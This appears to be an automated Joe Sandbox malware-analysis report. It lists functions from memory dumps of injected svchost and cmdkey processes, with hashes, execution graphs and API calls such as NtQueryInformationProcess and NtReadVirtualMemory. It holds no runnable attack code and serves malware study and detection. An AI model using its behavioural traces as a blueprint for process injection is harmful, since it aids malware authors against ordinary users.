                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.289275465830.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_3800000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                      • Instruction ID: d4bd6520683d65c44b28c87a41a7456ed65e68ebbc9e99acc6239583bc0fdbc3
                                                                                      • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                      • Instruction Fuzzy Hash:
                                                                                      Function 03867550 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 038A4592
                                                                                      • Execute=1, xrefs: 038A451E
                                                                                      • ExecuteOptions, xrefs: 038A44AB
                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 038A454D
                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 038A4460
                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 038A4530
                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 038A4507
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.289275465830.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_3800000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                      • API String ID: 0-484625025
                                                                                      • Opcode ID: 6f93427dce78b1753b5a0525775676a712fb90f0a0a872b5b4f3346ddcae13ad
                                                                                      • Instruction ID: 3c05f42753da55892cece6f384b3af0f63d298be8f97c34d15c6d1910d0dfbc9
                                                                                      • Opcode Fuzzy Hash: 6f93427dce78b1753b5a0525775676a712fb90f0a0a872b5b4f3346ddcae13ad
                                                                                      • Instruction Fuzzy Hash: 2651DD35A003196AEF10EAD9EC59FED736DEF04708F0405E9E515EB281DB70DA45CB91
                                                                                      Function 03839046 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.289275465830.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_3800000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $$@
                                                                                      • API String ID: 0-1194432280
                                                                                      • Opcode ID: 80605eb0cfe1acf5632b218dd36327f1606d23f71dc65ae9762f1b1790bc8e27
                                                                                      • Instruction ID: 6a65eced014ea4ab7f0dec7fff18cf60c126b8147e9cf6e7bf196078c3bfc073
                                                                                      • Opcode Fuzzy Hash: 80605eb0cfe1acf5632b218dd36327f1606d23f71dc65ae9762f1b1790bc8e27
                                                                                      • Instruction Fuzzy Hash: 7A813B76D00269DBDB31CB94CC44BEEB6B8AB48710F0445EAE91AF7250D7709E84CFA1

                                                                                      Execution Graph

                                                                                      Execution Coverage:0.5%
                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                      Signature Coverage:0%
                                                                                      Total number of Nodes:45
                                                                                      Total number of Limit Nodes:2
                                                                                      execution_graph 82514 31b29f0 LdrInitializeThunk 82516 31f5170 82517 31f51be 82516->82517 82538 31f51c8 82517->82538 82551 31b2b10 LdrInitializeThunk 82517->82551 82519 31f520d 82550 31f5216 82519->82550 82552 31b2b20 82519->82552 82521 31f5236 82523 31b2b90 LdrInitializeThunk 82521->82523 82522 31f5352 82525 31f555f 82522->82525 82555 31b2c50 LdrInitializeThunk 82522->82555 82527 31f5254 82523->82527 82526 31f556f 82525->82526 82556 31b2a80 LdrInitializeThunk 82525->82556 82530 31f558c 82526->82530 82557 31b2b90 LdrInitializeThunk 82526->82557 82531 31b2b10 LdrInitializeThunk 82527->82531 82533 31f559c 82530->82533 82558 31b2a80 LdrInitializeThunk 82530->82558 82534 31f5276 82531->82534 82536 31f55ac 82533->82536 82559 31b2a80 LdrInitializeThunk 82533->82559 82539 31f52ad 82534->82539 82540 31f52f4 82534->82540 82534->82550 82536->82538 82560 31b2a80 LdrInitializeThunk 82536->82560 82543 31f55e0 579 API calls 82539->82543 82541 31b2e50 LdrInitializeThunk 82540->82541 82544 31f531c 82541->82544 82543->82550 82545 31b2c30 LdrInitializeThunk 82544->82545 82544->82550 82546 31f534c 82545->82546 82546->82522 82547 31b2c30 LdrInitializeThunk 82546->82547 82549 31f537e 82547->82549 82548 31b0554 12 API calls 82548->82550 82549->82548 82549->82550 82550->82522 82554 31b2c50 LdrInitializeThunk 82550->82554 82551->82519 82561 31b2b2a 82552->82561 82554->82522 82555->82525 82556->82526 82557->82530 82558->82533 82559->82536 82560->82538 82562 31b2b3f LdrInitializeThunk 82561->82562 82563 31b2b31 82561->82563 82565 303ef38 82566 303ef5d 82565->82566 82567 303f0c8 NtQueryInformationProcess 82566->82567 82570 303f135 82566->82570 82568 303f102 82567->82568 82569 303f1d4 NtReadVirtualMemory 82568->82569 82568->82570 82569->82570

                                                                                      Executed Functions

                                                                                      Function 0303EF38 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 541nativeCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 0 303ef38-303ef5b 1 303ef79-303ef99 call 3041168 call 303cfa8 0->1 2 303ef5d-303ef74 call 3041148 0->2 8 303f548-303f553 1->8 9 303ef9f-303f09f call 303ee68 call 3041168 call 3045074 call 3030398 call 3040738 call 3030398 call 3040738 call 3042e38 1->9 2->1 26 303f0a5-303f133 call 3030398 call 3040738 NtQueryInformationProcess call 3041168 call 3030398 call 3040738 9->26 27 303f53c-303f543 call 303ee68 9->27 39 303f147-303f1bd call 3045082 call 3030398 call 3040738 26->39 40 303f135-303f142 26->40 27->8 39->40 49 303f1c3-303f1d2 call 30450ac 39->49 40->27 52 303f1d4-303f215 NtReadVirtualMemory call 3041e58 49->52 53 303f21f-303f25f call 3030398 call 3040738 call 3043778 49->53 56 303f21a 52->56 62 303f261-303f279 53->62 63 303f27e-303f36e call 3030398 call 3040738 call 30450ba call 3030398 call 3040738 call 3043158 call 3041118 * 3 call 30450ac 53->63 56->27 62->27 86 303f370-303f39c call 30450ac call 3041118 call 304510e call 30450c8 63->86 87 303f39e-303f3b3 call 30450ac 63->87 99 303f3f3-303f3fd 86->99 92 303f3b5-303f3d7 call 3042908 87->92 93 303f3dc-303f3ee call 3041d98 87->93 92->93 93->99 101 303f403-303f44d call 3030398 call 3040738 call 3043468 call 30450ac 99->101 102 303f4b9-303f51c call 3030398 call 3040738 call 3043a88 99->102 120 303f47f-303f487 call 30450ac 101->120 121 303f44f-303f475 call 3045158 call 304510e 101->121 102->27 126 303f51e-303f537 call 3041148 102->126 120->102 130 303f489-303f494 120->130 121->120 126->27 130->102 131 303f496-303f4b4 call 3043d98 130->131 131->102
                                                                                      APIs
                                                                                      • NtQueryInformationProcess.NTDLL ref: 0303F0E7
                                                                                      • NtReadVirtualMemory.NTDLL ref: 0303F1EF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.292817352368.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_3030000_cmdkey.jbxd
                                                                                      Similarity
                                                                                      • API ID: InformationMemoryProcessQueryReadVirtual
                                                                                      • String ID: 0$vTd;
                                                                                      • API String ID: 1498878907-344068449
                                                                                      • Opcode ID: 2deb738232a90cf013e171ff241047587262a987c3884ba519dfaefcf981df23
                                                                                      • Instruction ID: 37b28ea1ec61ff7542fd484c382b4831aecece17affa14857b1c32dcfcef7535
                                                                                      • Opcode Fuzzy Hash: 2deb738232a90cf013e171ff241047587262a987c3884ba519dfaefcf981df23
                                                                                      • Instruction Fuzzy Hash: AA020E74519B8C8FCBA9EF68C894AEE77E5FF99304F00462A994AD7240DF34D641CB42
                                                                                      Function 031B4260 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.292817455715.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: true
                                                                                      • Associated: 00000006.00000002.292817455715.0000000003269000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.292817455715.000000000326D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_3140000_cmdkey.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 1c7218f48fa0067f437b9813edf4d570b7bc09f3585b040f1e91a4f6feb67c84
                                                                                      • Instruction ID: eb88e68a39aa66cc1eec20957be6b1e48ec6bfa02e4bf5dc029d3978c7c1a724
                                                                                      • Opcode Fuzzy Hash: 1c7218f48fa0067f437b9813edf4d570b7bc09f3585b040f1e91a4f6feb67c84
                                                                                      • Instruction Fuzzy Hash: E590023161544413A540B1584AC45464005A7F4301B51C419E0425594CCB3489566371
                                                                                      Function 031B4570 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.292817455715.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: true
                                                                                      • Associated: 00000006.00000002.292817455715.0000000003269000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.292817455715.000000000326D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_3140000_cmdkey.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 0a2c1e0b89be67b90a9cb9bf7cf5f906609532d92f04a440bf72e2d53450ef67
                                                                                      • Instruction ID: ce035bdd44b853c0f3d307a9ff6aed5bda0de8a08a2ad91e97674fdc8c3e6f99
                                                                                      • Opcode Fuzzy Hash: 0a2c1e0b89be67b90a9cb9bf7cf5f906609532d92f04a440bf72e2d53450ef67
                                                                                      • Instruction Fuzzy Hash: B9900261611144435540B1584A444066005A7F5301391C51DA05555A0CC7388855A279
                                                                                      Function 031B2B10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 143 31b2b10-31b2b1c LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.292817455715.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: true
                                                                                      • Associated: 00000006.00000002.292817455715.0000000003269000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.292817455715.000000000326D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_3140000_cmdkey.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 86a89c60eb2dd8ac19be9778a9f5afa58afdc5296c24fb74f258c7f9e9ec20f8
                                                                                      • Instruction ID: 711476be02dbe183cf34d54a8e6108063ff1bf9b5e7da20c0a89c297df5670a1
                                                                                      • Opcode Fuzzy Hash: 86a89c60eb2dd8ac19be9778a9f5afa58afdc5296c24fb74f258c7f9e9ec20f8
                                                                                      • Instruction Fuzzy Hash: BA90023121104C03E580B158464464A000597E5301F91C41DA0026694DCB358A5977B1
                                                                                      Function 031B2B00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 142 31b2b00-31b2b0c LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.292817455715.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: true
                                                                                      • Associated: 00000006.00000002.292817455715.0000000003269000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.292817455715.000000000326D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_3140000_cmdkey.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: c8df52f23d691eed5c88d0376882a431dd2eb3bfd1db9db7188007bdc944be56
                                                                                      • Instruction ID: 2ae9b84019f7c44452d596ad2228bdd9ee706ca3ea2517ce2d17d5e39c36dbeb
                                                                                      • Opcode Fuzzy Hash: c8df52f23d691eed5c88d0376882a431dd2eb3bfd1db9db7188007bdc944be56
                                                                                      • Instruction Fuzzy Hash: CF90023121508C43E540B1584644A46001597E4305F51C419A00656D4DD7358D55B671
                                                                                      Function 031B2B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 145 31b2b90-31b2b9c LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.292817455715.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: true
                                                                                      • Associated: 00000006.00000002.292817455715.0000000003269000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.292817455715.000000000326D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_3140000_cmdkey.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 2f43d6ef66938e6614ba7c4a550275bb7f7585f3355d43a1821c3ca85096dd01
                                                                                      • Instruction ID: 6a0337fb4e3dc05c5dc5b34e2c3f2bfc741c086ed2deb18aa18d7cf9413b64c8
                                                                                      • Opcode Fuzzy Hash: 2f43d6ef66938e6614ba7c4a550275bb7f7585f3355d43a1821c3ca85096dd01
                                                                                      • Instruction Fuzzy Hash: 929002312110CC03E510A158864474A000597E4301F55C819A4425698DC7B588917131
                                                                                      Function 031B2B80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 144 31b2b80-31b2b8c LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.292817455715.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: true
                                                                                      • Associated: 00000006.00000002.292817455715.0000000003269000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.292817455715.000000000326D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_3140000_cmdkey.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: d35f84ca9448142b6bb21f5105328ff9f44d1230e7b4b708c29b44f5a5a09bcc
                                                                                      • Instruction ID: 3553dcefaea567fb3b647bcd28d4d9b37b7b2436d931008b42e3026ce45764f4
                                                                                      • Opcode Fuzzy Hash: d35f84ca9448142b6bb21f5105328ff9f44d1230e7b4b708c29b44f5a5a09bcc
                                                                                      • Instruction Fuzzy Hash: F690023121104C43E500A1584644B46000597F4301F51C41EA0125694DC735C8517531
                                                                                      Function 031B2BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 146 31b2bc0-31b2bcc LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.292817455715.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: true
                                                                                      • Associated: 00000006.00000002.292817455715.0000000003269000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.292817455715.000000000326D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_3140000_cmdkey.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 7c3f2f2cfe597c3e6664f885dc035e4d7ab7eb843dead1ec9a48e71f4ad307ca
                                                                                      • Instruction ID: 3429e01e1c935eee24fa68ef4557da7ea968ed46901093a4529e124dab56ca39
                                                                                      • Opcode Fuzzy Hash: 7c3f2f2cfe597c3e6664f885dc035e4d7ab7eb843dead1ec9a48e71f4ad307ca
                                                                                      • Instruction Fuzzy Hash: F190023121104803E500A5985648646000597F4301F51D419A5025595EC77588917131
                                                                                      Function 031B2A10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 139 31b2a10-31b2a1c LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.292817455715.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: true
                                                                                      • Associated: 00000006.00000002.292817455715.0000000003269000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.292817455715.000000000326D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_3140000_cmdkey.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 667301152422b035eed911aeea4ca8570a68ae7d0110eaded42f6b2b91c3c66f
                                                                                      • Instruction ID: 2c1582a88a60a90939e432978d0686517843fdd129bc813979f3342f72f3c870
                                                                                      • Opcode Fuzzy Hash: 667301152422b035eed911aeea4ca8570a68ae7d0110eaded42f6b2b91c3c66f
                                                                                      • Instruction Fuzzy Hash: 97900225231044031545E558074450B0445A7EA351391C41DF14175D0CC73188656331
                                                                                      Function 031B2A80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 140 31b2a80-31b2a8c LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.292817455715.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: true
                                                                                      • Associated: 00000006.00000002.292817455715.0000000003269000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.292817455715.000000000326D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_3140000_cmdkey.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 58ae4ee9b334316315640e4f27457584919dcc249688aae4327741199260f140
                                                                                      • Instruction ID: ba94f2ff9dfbeb4cb944cdc80d1d6a940cf7c9d464aa4894ca2f271cd8554014
                                                                                      • Opcode Fuzzy Hash: 58ae4ee9b334316315640e4f27457584919dcc249688aae4327741199260f140
                                                                                      • Instruction Fuzzy Hash: 86900261212044035505B1584654616400A97F4201B51C429E10155D0DC73588917135
                                                                                      Function 031B2AC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 141 31b2ac0-31b2acc LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.292817455715.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: true
                                                                                      • Associated: 00000006.00000002.292817455715.0000000003269000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.292817455715.000000000326D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_3140000_cmdkey.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: aa30641b4320fe2ae06acf14a7160df08459f3b412e4cbfb2bcf7a178ec66488
                                                                                      • Instruction ID: 77fbeec455acd402e4e75131bcdc955d9d27f365348adc2e26a86005dcd8f0cb
                                                                                      • Opcode Fuzzy Hash: aa30641b4320fe2ae06acf14a7160df08459f3b412e4cbfb2bcf7a178ec66488
                                                                                      • Instruction Fuzzy Hash: 2390023161504C03E550B1584654746000597E4301F51C419A0025694DC7758A5576B1
                                                                                      Function 031B29F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 138 31b29f0-31b29fc LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.292817455715.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: true
                                                                                      • Associated: 00000006.00000002.292817455715.0000000003269000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.292817455715.000000000326D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_3140000_cmdkey.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 7efb847b941046504031dc39b4511f9373229a8a58d3f14ac32b0cb8782a39ff
                                                                                      • Instruction ID: 3d9e7909581dd06c252c83e70fcb2a214fa8bea77ea64535e3c8d60ea63d1815
                                                                                      • Opcode Fuzzy Hash: 7efb847b941046504031dc39b4511f9373229a8a58d3f14ac32b0cb8782a39ff
                                                                                      • Instruction Fuzzy Hash: BE900225221044031505E5580744507004697E9351351C429F1016590CD73188616131
                                                                                      Function 031B2F00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.292817455715.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: true
                                                                                      • Associated: 00000006.00000002.292817455715.0000000003269000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.292817455715.000000000326D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_3140000_cmdkey.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 1bfc5e8c587e936ced33d686f913e0f3eaa2913b18ee8332381a9435229af6b4
                                                                                      • Instruction ID: d1f9952c5fbd938923d1c1eaf52711bec192477d68c0b33a190a776f57cd62c0
                                                                                      • Opcode Fuzzy Hash: 1bfc5e8c587e936ced33d686f913e0f3eaa2913b18ee8332381a9435229af6b4
                                                                                      • Instruction Fuzzy Hash: 8D90022122184443E600A5684E54B07000597E4303F51C51DA0155594CCB3588616531
                                                                                      Function 031B2E00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.292817455715.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: true
                                                                                      • Associated: 00000006.00000002.292817455715.0000000003269000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.292817455715.000000000326D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_3140000_cmdkey.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 8e2d7989e8650375025a4a9b491171e202d5b30fbbed654dc5f06d984d2a6d1b
                                                                                      • Instruction ID: 5b3705bcfb19cd4edaab728dfa812d571aee17f48c7cd170e6b232c78394ec68
                                                                                      • Opcode Fuzzy Hash: 8e2d7989e8650375025a4a9b491171e202d5b30fbbed654dc5f06d984d2a6d1b
                                                                                      • Instruction Fuzzy Hash: AD90026121144803E540A5584A44607000597E4302F51C419A2065595ECB398C517135
                                                                                      Function 031B2E50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.292817455715.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: true
                                                                                      • Associated: 00000006.00000002.292817455715.0000000003269000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.292817455715.000000000326D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_3140000_cmdkey.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: e38d2f7ba84d4267699ad583760407e73f83e59fca7ad016d5d15882af44a8d1
                                                                                      • Instruction ID: 021e4e8006c13d296197887268d422e0797414f4f180a1f110600136b9e4bbe1
                                                                                      • Opcode Fuzzy Hash: e38d2f7ba84d4267699ad583760407e73f83e59fca7ad016d5d15882af44a8d1
                                                                                      • Instruction Fuzzy Hash: 7890026135104843E500A1584654B060005D7F5301F51C41DE1065594DC739CC527136
                                                                                      Function 031B2ED0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.292817455715.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: true
                                                                                      • Associated: 00000006.00000002.292817455715.0000000003269000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.292817455715.000000000326D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_3140000_cmdkey.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 2d4fdd1f30376372ad2c6225cb52cb3b48eec3288d432f4e6f9dfac5aad54e02
                                                                                      • Instruction ID: c7a879449320461cbff80ebb17a435a19edecfd9932bdefa11e6a82919d724f5
                                                                                      • Opcode Fuzzy Hash: 2d4fdd1f30376372ad2c6225cb52cb3b48eec3288d432f4e6f9dfac5aad54e02
                                                                                      • Instruction Fuzzy Hash: 4B900221611044435540B1688A849064005BBF5211751C529A0999590DC77988656675
                                                                                      Function 031B2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 150 31b2d10-31b2d1c LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.292817455715.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: true
